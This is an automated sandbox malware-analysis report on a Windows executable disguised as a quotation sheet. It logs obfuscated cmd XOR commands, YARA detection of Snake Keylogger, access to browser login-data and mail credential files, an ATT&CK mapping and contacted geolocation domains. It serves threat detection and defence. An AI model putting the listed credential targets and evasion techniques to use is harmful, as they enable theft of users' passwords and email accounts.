            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5668, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Email Collection            		21
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts11
            Process Injection            		31
            Virtualization/Sandbox Evasion            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Access Token Manipulation            		Security Account Manager1
            Time Based Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Time Based Evasion            		Cached Domain Credentials115
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480054 Sample: z1QuotationSheetVSAA6656776.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 38 reallyfreegeoip.org 2->38 40 checkip.dyndns.org 2->40 42 3 other IPs or domains 2->42 50 Found malware configuration 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for submitted file 2->54 58 3 other signatures 2->58 8 z1QuotationSheetVSAA6656776.exe 37 2->8         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 38->56 process4 file5 34 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\System.dll, PE32 8->36 dropped 60 Obfuscated command line found 8->60 62 Mass process execution to delay analysis 8->62 64 Switches to a custom stack to bypass stack traces 8->64 12 z1QuotationSheetVSAA6656776.exe 15 8 8->12         started        16 cmd.exe 8->16         started        18 cmd.exe 8->18         started        20 62 other processes 8->20 signatures6 process7 dnsIp8 44 reallyfreegeoip.org 172.67.177.134, 443, 49782, 49783 CLOUDFLARENETUS United States 12->44 46 checkip.dyndns.com 158.101.44.242, 49781, 80 ORACLE-BMC-31898US United States 12->46 48 2 other IPs or domains 12->48 66 Tries to steal Mail credentials (via file / registry access) 12->66 68 Tries to harvest and steal browser information (history, passwords, etc) 12->68 22 Conhost.exe 16->22         started        24 Conhost.exe 18->24         started        26 Conhost.exe 20->26         started        28 Conhost.exe 20->28         started        30 Conhost.exe 20->30         started        32 59 other processes 20->32 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z1QuotationSheetVSAA6656776.exe50%ReversingLabsWin32.Trojan.Guloader
            z1QuotationSheetVSAA6656776.exe100%AviraHEUR/AGEN.1333750

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://drive.google.com/0%Avira URL Cloudsafe
            http://checkip.dyndns.orgd0%Avira URL Cloudsafe
            http://reallyfreegeoip.org0%Avira URL Cloudsafe
            http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/149.18.24.104$0%Avira URL Cloudsafe
            https://drive.google.com/z0%Avira URL Cloudsafe
            http://reallyfreegeoip.orgd0%Avira URL Cloudsafe
            http://checkip.dyndns.org/0%Avira URL Cloudsafe
            http://checkip.dyndns.comd0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://apis.google.com0%Avira URL Cloudsafe
            http://checkip.dyndns.com0%Avira URL Cloudsafe
            http://www.quovadis.bm00%Avira URL Cloudsafe
            http://checkip.dyndns.org0%Avira URL Cloudsafe
            https://drive.usercontent.google.com/0%Avira URL Cloudsafe
            https://reallyfreegeoip.org0%Avira URL Cloudsafe
            http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
            https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
            http://checkip.dyndns.org/d0%Avira URL Cloudsafe
            https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/149.18.24.1040%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.251.167.113
            		truefalse
              		unknown
              drive.usercontent.google.com
              		142.251.111.132
              		truefalse
                		unknown
                reallyfreegeoip.org
                		172.67.177.134
                		truetrue
                  		unknown
                  checkip.dyndns.com
                  		158.101.44.242
                  		truefalse
                    		unknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                      • Avira URL Cloud: safe
                      		unknown
                      https://reallyfreegeoip.org/xml/149.18.24.104false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.google.comz1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpfalse
